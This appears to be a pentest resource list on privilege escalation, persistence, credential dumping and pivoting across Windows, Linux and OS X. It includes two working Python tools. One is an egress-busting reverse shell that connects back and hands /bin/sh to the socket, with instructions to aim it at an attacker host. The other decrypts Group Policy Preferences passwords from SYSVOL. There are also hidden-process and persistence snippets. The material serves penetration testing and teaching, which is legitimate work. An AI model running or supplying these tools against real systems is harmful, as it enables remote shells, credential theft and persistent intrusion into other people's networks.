##Privilege Escalation & Post-Exploitation
Learn how to hide your trojans, backdoors, etc. from antivirus.
No one expects command execution!
- AD PowerShell Recon Scripts
Group Policy Preferences trick
Article Explaining what the KRBTGT account in AD is:
###General Privilege Escalation
Execute ShellCode Using Python
- In this article I am going to show you how we can use Python and its "ctypes" library to execute "calc.exe" shellcode, or any other shellcode.
###Privilege Escalation - Linux
Using the docker command to root the host (totally not a security issue)
- It is possible to do a few more things more with docker besides working with containers, such as creating a root shell on the host, overwriting system configuration files, reading restricted stuff, etc.
- Linux Exploit Suggester; keyed on the operating system release number. Run without arguments, it performs 'uname -r' to grab the kernel release and returns a list of possible exploits for that version. Nothing fancy, so a back-ported fix may fool this script, which is why every suggestion still has to be confirmed by hand. It is also possible to pass the '-k' flag to enter the kernel version/OS release manually.
Basic Linux Privilege Escalation - g0tmi1k
- Not so much a script as a resource, g0tmi1k's blog post here has led to so many privilege escalations on Linux systems it's not funny. Would definitely recommend trying out everything on this post for enumerating systems.
- This tool is great at running through a heap of things you should check on a Linux system during post-exploitation. These include file permissions, cron jobs (if visible), weak credentials, etc. The first thing I run on a newly compromised system.
- This is a great tool for once again checking a lot of standard things like file permissions etc. The real gem of this script is the recommended privilege escalation exploits given at the conclusion of the script. This is a great starting point for escalation.
Unix Privilege Escalation Checker
- Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases). It is written as a single shell script so it can be easily uploaded and run (as opposed to un-tarred, compiled and installed). It can run either as a normal user or as root (obviously it does a better job when running as root because it can read more files).
###Privilege Escalation - Windows
Windows Privilege Escalation Fundamentals
Windows Exploit Suggester
Some forum posts on Win Priv Esc
PowerUp
- PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities.
Windows Privilege Escalation Cheat Sheet/Tricks
How to own any windows network with group policy hijacking attacks
Hacking Windows through the Windows API; delves into the Windows API and how it can be turned against itself
Analyzing local privilege escalations in win32k
- This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.
Exploiting Windows 2008 Group Policy Preferences
Extreme Privilege Escalation on Windows 8 UEFI Systems
- Summary by stormehh from reddit: “In this whitepaper (and accompanying Defcon/Blackhat presentations), the authors demonstrate vulnerabilities in the UEFI "Runtime Service" interface accessible by a privileged userland process on Windows 8. This paper steps through the exploitation process in great detail and demonstrates the ability to obtain code execution in SMM and maintain persistence by means of overwriting SPI flash”
Old Privilege Escalation Techniques
- PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)
All roads lead to SYSTEM
Dump Windows password hashes efficiently - Part 1
###Privilege Escalation - OS X
Hidden backdoor API to root privileges in Apple OS X
Mac OS X local privilege escalation (IOBluetoothFamily)
Privilege Escalation on OS X below 10.0
File Server Triage on Red Team Engagements
Finding your external IP:
Simply curl any of the following addresses: ident.me, ifconfig.me or whatsmyip.akamai.com
Egress Buster Reverse Shell
- Egress Buster Reverse Shell: brute-forces egress ports until one is found, then executes a reverse shell over it (from TrustedSec).
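Added example, not TrustedSec's code: the same brute-force-the-egress idea in Python. find_egress_port walks a candidate list and returns the first port on which the TCP handshake completes; egress_bust then hands that port to an action, by default a connect-back shell. The start_local_listener/demo helpers are a constructed test setup that stands up a throwaway listener on loopback so the probing can be exercised offline without a real handler.

```python
import socket
import subprocess
import threading

# Ports a corporate egress filter most often leaves open, tried in this order.
COMMON_EGRESS_PORTS = (443, 80, 53, 8080, 8443, 22, 25, 21, 993, 995)


def find_egress_port(host, ports=COMMON_EGRESS_PORTS, timeout=1.0):
    """Return the first port on which a TCP connection to host completes, else None.

    A completed handshake means the path out is open and something is listening,
    which is exactly what a reverse-shell handler needs.  Refused or timed-out
    connections mean the port is filtered or nobody is listening there.
    """
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return port
        except OSError:
            continue
    return None


def reverse_shell(host, port, shell="/bin/sh"):
    """The 'execute' step: connect back and wire a shell's stdio to the socket (POSIX)."""
    sock = socket.create_connection((host, port))
    return subprocess.call([shell, "-i"], stdin=sock, stdout=sock, stderr=sock)


def egress_bust(host, ports=COMMON_EGRESS_PORTS, action=reverse_shell):
    """Find an open egress port and run action(host, port) on it; None if all fail."""
    port = find_egress_port(host, ports)
    if port is None:
        return None
    action(host, port)
    return port


def start_local_listener():
    """Constructed test helper: a throwaway TCP listener standing in for the handler."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:      # srv.close() ends the loop
                break

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def demo():
    """Offline check: a closed port is skipped, the live listener is found."""
    srv, live_port = start_local_listener()
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                          # nothing listens here now -> refused
    try:
        found = egress_bust("127.0.0.1", (closed_port, live_port),
                            action=lambda host, port: None)
    finally:
        srv.close()
    return found == live_port


if __name__ == "__main__":
    print("egress probing works:", demo())
```

Against a real handler, point egress_bust at the attacker host with the default action; the handler side only needs a listener on every candidate port (a single socat or nc loop will do), since whichever port the client reaches first is the one the shell arrives on.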
Determine Public IP from CLI
- PyBuild is a tool for automating the PyInstaller method of compiling Python code into an executable. This works on Windows, Linux, and OS X (PE and ELF formats). (From TrustedSec)
[More on Using Bash's Built-in /dev/tcp File (TCP/IP)](http://www.linuxjournal.com/content/more-using-bashs-built-devtcp-file-tcpip)
Dumping user passwords in plaintext on Windows 8.1 and Server 2012
PShell Script: Extract All GPO Set Passwords From Domain
- This script parses the domain's Policies folder in SYSVOL looking for Groups.xml files. These files contain either a username change, a password setting, or both, which gives you the raw data for local accounts and/or passwords enforced using Group Policy Preferences. Microsoft chose to use a static AES key for encrypting this password, and then published that key in its own GPP documentation (MS-GPPREF). How awesome is that! Note that MS14-025 only removed the ability to set new passwords this way; any Groups.xml with a cpassword that was already in SYSVOL stays there until an administrator deletes it.
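Added example (not the PowerShell script linked above): the decryption side in Python, using the AES key from MS-GPPREF. It assumes the cryptography package is installed and returns None from decrypt_cpassword when it is not. The Groups.xml fragment is constructed for the example; the cpassword inside it is the commonly circulated gpp-decrypt test vector.

```python
import base64
import re

# 32-byte AES key published in Microsoft's MS-GPPREF specification.  Every
# Group Policy Preferences cpassword is encrypted with it, so anyone who can
# read SYSVOL (every domain user) can decrypt them.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8"
    "f496e806cc057990209b09a433b66c1b"
)
AES_IV = bytes(16)          # all-zero IV, per the specification

# Widely circulated test vector; its plaintext is "Local*P4ssword!".
SAMPLE_CPASSWORD = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"

# Constructed Groups.xml fragment in the shape GPP writes under
# <domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\Groups\Groups.xml
SAMPLE_GROUPS_XML = (
    '<Groups><User name="LocalAdmin">'
    '<Properties action="U" userName="LocalAdmin" '
    f'cpassword="{SAMPLE_CPASSWORD}" changeLogon="0" neverExpires="1"/>'
    '</User></Groups>'
)


def find_cpasswords(xml_text):
    """Pull every cpassword attribute out of a preferences XML file."""
    return re.findall(r'cpassword="([^"]*)"', xml_text)


def cpassword_to_ciphertext(cpassword):
    """GPP strips the base64 '=' padding; restore it and decode to raw AES-CBC ciphertext."""
    padded = cpassword + "=" * (-len(cpassword) % 4)
    ciphertext = base64.b64decode(padded)
    if len(ciphertext) % 16 != 0:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    return ciphertext


def decrypt_cpassword(cpassword):
    """Return the plaintext password, or None when no AES implementation is available.

    Assumption: the 'cryptography' package is installed.  The plaintext is
    UTF-16LE with PKCS#7 padding, the same handling gpp-decrypt uses.
    """
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError:
        return None
    ciphertext = cpassword_to_ciphertext(cpassword)
    decryptor = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(AES_IV)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    pad_len = padded[-1]
    if not 1 <= pad_len <= 16 or padded[-pad_len:] != bytes([pad_len]) * pad_len:
        raise ValueError("bad PKCS#7 padding: corrupted cpassword")
    return padded[:-pad_len].decode("utf-16-le")


if __name__ == "__main__":
    for cp in find_cpasswords(SAMPLE_GROUPS_XML):
        print(cp, "->", decrypt_cpassword(cp))
```

The same cpassword attribute also appears in Services.xml, ScheduledTasks.xml, DataSources.xml, Printers.xml and Drives.xml, so search all of SYSVOL rather than only the Groups folder.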
Client Side attacks using Powershell
I Hunt Sysadmins 2.0
- It covers various ways to hunt for users in Windows domains, including using PowerView.
Abusing Active Directory in Post-Exploitation - Carlos Perez - Derbycon 2014
- Windows APIs are often a blackbox with poor documentation, taking input and spewing output with little visibility on what actually happens in the background. By reverse engineering (and abusing) some of these seemingly benign APIs, we can effectively manipulate Windows into performing stealthy custom attacks using previously unknown persistent and injection techniques. In this talk, we’ll get Windows to play with itself nonstop while revealing 0day persistence, previously unknown DLL injection techniques, and Windows API tips and tricks. To top it all off, a custom HTTP beaconing backdoor will be released leveraging the newly released persistence and injection techniques. So much Windows abuse, so little time.
15 Ways to bypass Powershell execution-policy settings
- Does what it says on the tin. Overall, it's clear that execution-policy was not meant as a security method. Or if it was, someone was drinking a bit too much.
Post-Exploitation on Windows using ActiveX Controls
WMI Shell Tool
- The WMI shell tool that we have developed allows us to execute commands and get their output using only the WMI infrastructure, without any help from other services, like the SMB server. With the wmi-shell tool we can execute commands, upload files and recover Windows passwords remotely using only the WMI service available on port 135.
Dirty Powershell Webserver
[Dumping Windows Credentials](https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/)
Dumping hashes from Active Directory for cracking
NTDSXtract - Active Directory Forensics Framework
- Description from the page: This framework was developed by the author in order to provide the community with a solution to extract forensically important information from the main database of Microsoft Active Directory (NTDS.DIT).
Post exploitation trick - Phish users for creds on domains, from their own box
- Veil-PowerView is a powershell tool to gain network situational awareness on Windows domains. It contains a set of pure-powershell replacements for various windows "net *" commands, which utilize powershell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.
Egress Testing using PowerShell
Domain Trusts: Why You Should Care
Using Alternate Data Streams to Persist on a Compromised Machine
An Introduction to Backdooring Operating Systems for Fun and trolling - Defcon22
Windows Event Log Driven Backdoors
List of low-level attacks/persistence techniques. HIGHLY RECOMMENDED!
Windows Registry Persistence, Part 1: Introduction, Attack Phases and Windows Services
Temporal Persistence with bitsadmin and schtasks
Windows Event Log Driven Back Doors
COM Object hijacking: the discreet way of persistence
Thousand ways to backdoor a Windows domain (forest)
Windows Firewall Hook Enumeration
- We’re going to look in detail at Microsoft Windows Firewall Hook drivers from Windows 2000, XP and 2003. This functionality was leveraged by the Derusbi family of malicious code to implement port-knocking like functionality. We’re going to discuss the problem we faced, the required reverse engineering to understand how these hooks could be identified and finally how the enumeration tool was developed.
NTFS Alternate Data Streams for pentesters (part 1)
Windows task scheduler
How to start a hidden process?
Start-Process -WindowStyle Hidden -FilePath "path-to-exe-to-be-hidden"
Windows Startup Application Database
Startup folder on Win8
- C:\Users\YOURUSER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Linux cron tab
What's the easiest way to have a script run at boot time in OS X? - Stack Overflow
Userland Persistence On Mac Os X "It Just Works" - Shmoocon 2015
- Got root on OS X? Do you want to persist between reboots and have access whenever you need it? You do not need plists, new binaries, scripts, or other easily noticeable techniques. Kext programming and kernel patching can be troublesome! Leverage already running daemon processes to guarantee your access. The presentation shows how easy it is, given userland administrative access (read: root), to persist between reboots without plists, non-native binaries, scripting, kexts or kernel patching, using the Backdoor Factory.
- socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals.
- Examples of use
Pivoting Ssh Reverse Tunnel Gateway
Portfwd - Pivot from within meterpreter
SSH Gymnastics and Tunneling with ProxyChains
SSH Cheat Sheet - pentestmonkey
Pivoting into a network using PLINK and FPipe
Reverse SSL backdoor with socat and metasploit (and proxies)
Pass-the-Hash is Dead: Long Live Pass-the-Hash
Still Passing the Hash 15 Years Later
pth-toolkit, i.e. a portable pass-the-hash toolkit
The Evolution of Protected Processes Part 1: Pass-the-Hash Mitigations in Windows 8.1
Et tu Kerberos - Christopher Campbell
PsExec and the Nasty Things It Can Do
- An overview of what PsExec is and what its capabilities are from an administrative standpoint.